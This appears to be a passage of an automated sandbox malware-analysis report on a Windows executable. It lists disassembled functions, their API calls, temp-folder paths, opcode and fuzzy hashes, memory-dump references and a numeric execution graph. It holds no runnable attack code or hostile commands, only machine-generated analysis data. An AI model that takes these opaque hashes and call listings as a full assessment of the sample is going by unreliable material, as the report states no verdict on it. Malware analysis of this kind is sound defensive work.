                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                      • String ID: 4Wu$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 3248276644-3057243036
                                                                                                                                                                                                                                      • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                                                                                                                                                                                                      • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                                                                                                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 2659869361-4083868402
                                                                                                                                                                                                                                      • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                      • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                                                                      • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                                                                                                                                                                                                      • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0040550C
                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                                                                                                                                                                                                                                        • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                                                                                      • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040663C,80000002), ref: 0040641B
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 00406426
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                                                                      • String ID: : Completed
                                                                                                                                                                                                                                      • API String ID: 3356406503-2954849223
                                                                                                                                                                                                                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                                                                                                      • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403B42
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 1100898210-4083868402
                                                                                                                                                                                                                                      • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                                                                                      • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
                                                                                                                                                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405E38
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                      • API String ID: 2709904686-1876063424
                                                                                                                                                                                                                                      • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                      • Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                      • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                      • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:4.1%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:2.1%
                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                      Total number of Limit Nodes:116
                                                                                                                                                                                                                                      execution_graph 98017 e71066 98022 e7aaaa 98017->98022 98019 e7106c 98055 e92f70 98019->98055 98023 e7aacb 98022->98023 98058 e902eb 98023->98058 98027 e7ab12 98068 e81207 98027->98068 98030 e81207 59 API calls 98031 e7ab26 98030->98031 98032 e81207 59 API calls 98031->98032 98033 e7ab30 98032->98033 98034 e81207 59 API calls 98033->98034 98035 e7ab6e 98034->98035 98036 e81207 59 API calls 98035->98036 98037 e7ac39 98036->98037 98073 e90588 98037->98073 98041 e7ac6b 98042 e81207 59 API calls 98041->98042 98043 e7ac75 98042->98043 98101 e8fe2b 98043->98101 98045 e7acbc 98046 e7accc GetStdHandle 98045->98046 98047 eb2f39 98046->98047 98048 e7ad18 98046->98048 98047->98048 98050 eb2f42 98047->98050 98049 e7ad20 OleInitialize 98048->98049 98049->98019 98108 ed70f3 64 API calls Mailbox 98050->98108 98052 eb2f49 98109 ed77c2 CreateThread 98052->98109 98054 eb2f55 CloseHandle 98054->98049 98181 e92e74 98055->98181 98057 e71076 98110 e903c4 98058->98110 98061 e903c4 59 API calls 98062 e9032d 98061->98062 98063 e81207 59 API calls 98062->98063 98064 e90339 98063->98064 98117 e81821 98064->98117 98066 e7aad1 98067 e907bb 6 API calls 98066->98067 98067->98027 98069 e90fe6 Mailbox 59 API calls 98068->98069 98070 e81228 98069->98070 98071 e90fe6 Mailbox 59 API calls 98070->98071 98072 e7ab1c 98071->98072 98072->98030 98074 e81207 59 API calls 98073->98074 98075 e90598 98074->98075 98076 e81207 59 API calls 98075->98076 98077 e905a0 98076->98077 98176 e810c3 98077->98176 98080 e810c3 59 API calls 98081 e905b0 98080->98081 98082 e81207 59 API calls 98081->98082 98083 e905bb 98082->98083 98084 e90fe6 Mailbox 59 API calls 98083->98084 98085 e7ac43 98084->98085 98086 e8ff4c 98085->98086 98087 e8ff5a 98086->98087 98088 e81207 59 API calls 98087->98088 98089 e8ff65 98088->98089 98090 e81207 59 API calls 98089->98090 98091 e8ff70 98090->98091 98092 e81207 59 API calls 98091->98092 98093 e8ff7b 98092->98093 98094 e81207 59 API calls 98093->98094 98095 e8ff86 98094->98095 98096 e810c3 59 API calls 98095->98096 98097 e8ff91 98096->98097 98098 e90fe6 Mailbox 59 API calls 98097->98098 98099 e8ff98 RegisterWindowMessageW 98098->98099 98099->98041 98102 ec620c 98101->98102 98103 e8fe3b 98101->98103 98179 eda12a 59 API calls 98102->98179 98104 e90fe6 Mailbox 59 API calls 98103->98104 98106 e8fe43 98104->98106 98106->98045 98107 ec6217 98108->98052 98109->98054 98180 ed77a8 65 API calls 98109->98180 98111 e81207 59 API calls 98110->98111 98112 e903cf 98111->98112 98113 e81207 59 API calls 98112->98113 98114 e903d7 98113->98114 98115 e81207 59 API calls 98114->98115 98116 e90323 98115->98116 98116->98061 98118 e8189a 98117->98118 98119 e8182d __NMSG_WRITE 98117->98119 98130 e81981 98118->98130 98121 e81868 98119->98121 98122 e81843 98119->98122 98127 e81c7e 98121->98127 98126 e81b7c 59 API calls Mailbox 98122->98126 98125 e8184b _memmove 98125->98066 98126->98125 98134 e90fe6 98127->98134 98129 e81c88 98129->98125 98131 e81998 _memmove 98130->98131 98132 e8198f 98130->98132 98131->98125 98132->98131 98172 e81aa4 98132->98172 98137 e90fee 98134->98137 98136 e91008 98136->98129 98137->98136 98139 e9100c std::exception::exception 98137->98139 98144 e9593c 98137->98144 98161 e935d1 DecodePointer 98137->98161 98162 e987cb RaiseException 98139->98162 98141 e91036 98163 e98701 58 API calls _free 98141->98163 98143 e91048 98143->98129 98145 e959b7 98144->98145 98150 e95948 98144->98150 98170 e935d1 DecodePointer 98145->98170 98147 e959bd 98171 e98d58 58 API calls __getptd_noexit 98147->98171 98148 e95953 98148->98150 98164 e9a39b 58 API calls 2 library calls 98148->98164 98165 e9a3f8 58 API calls 7 library calls 98148->98165 98166 e932cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98148->98166 98150->98148 98152 e9597b RtlAllocateHeap 98150->98152 98155 e959a3 98150->98155 98159 e959a1 98150->98159 98167 e935d1 DecodePointer 98150->98167 98152->98150 98153 e959af 98152->98153 98153->98137 98168 e98d58 58 API calls __getptd_noexit 98155->98168 98169 e98d58 58 API calls __getptd_noexit 98159->98169 98161->98137 98162->98141 98163->98143 98164->98148 98165->98148 98167->98150 98168->98159 98169->98153 98170->98147 98171->98153 98173 e81ab7 98172->98173 98175 e81ab4 _memmove 98172->98175 98174 e90fe6 Mailbox 59 API calls 98173->98174 98174->98175 98175->98131 98177 e81207 59 API calls 98176->98177 98178 e810cb 98177->98178 98178->98080 98179->98107 98182 e92e80 __fcloseall 98181->98182 98189 e93447 98182->98189 98188 e92ea7 __fcloseall 98188->98057 98206 e99e3b 98189->98206 98191 e92e89 98192 e92eb8 DecodePointer DecodePointer 98191->98192 98193 e92ee5 98192->98193 98194 e92e95 98192->98194 98193->98194 98252 e989d4 59 API calls __mbstowcs_l_helper 98193->98252 98203 e92eb2 98194->98203 98196 e92f48 EncodePointer EncodePointer 98196->98194 98197 e92f1c 98197->98194 98201 e92f36 EncodePointer 98197->98201 98254 e98a94 61 API calls __realloc_crt 98197->98254 98198 e92ef7 98198->98196 98198->98197 98253 e98a94 61 API calls __realloc_crt 98198->98253 98201->98196 98202 e92f30 98202->98194 98202->98201 98255 e93450 98203->98255 98207 e99e4c 98206->98207 98208 e99e5f EnterCriticalSection 98206->98208 98213 e99ec3 98207->98213 98208->98191 98210 e99e52 98210->98208 98237 e932e5 58 API calls 3 library calls 98210->98237 98214 e99ecf __fcloseall 98213->98214 98215 e99ed8 98214->98215 98216 e99ef0 98214->98216 98238 e9a39b 58 API calls 2 library calls 98215->98238 98219 e99f11 __fcloseall 98216->98219 98241 e98a4d 58 API calls 2 library calls 98216->98241 98219->98210 98220 e99edd 98239 e9a3f8 58 API calls 7 library calls 98220->98239 98221 e99f05 98223 e99f1b 98221->98223 98224 e99f0c 98221->98224 98227 e99e3b __lock 58 API calls 98223->98227 98242 e98d58 58 API calls __getptd_noexit 98224->98242 98225 e99ee4 98240 e932cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98225->98240 98229 e99f22 98227->98229 98231 e99f2f 98229->98231 98232 e99f47 98229->98232 98243 e9a05b InitializeCriticalSectionAndSpinCount 98231->98243 98244 e92f85 98232->98244 98235 e99f3b 98250 e99f63 LeaveCriticalSection _doexit 98235->98250 98238->98220 98239->98225 98241->98221 98242->98219 98243->98235 98245 e92fb7 __dosmaperr 98244->98245 98246 e92f8e RtlFreeHeap 98244->98246 98245->98235 98246->98245 98247 e92fa3 98246->98247 98251 e98d58 58 API calls __getptd_noexit 98247->98251 98249 e92fa9 GetLastError 98249->98245 98250->98219 98251->98249 98252->98198 98253->98197 98254->98202 98258 e99fa5 LeaveCriticalSection 98255->98258 98257 e92eb7 98257->98188 98258->98257 98259 ed92c8 98260 ed92db 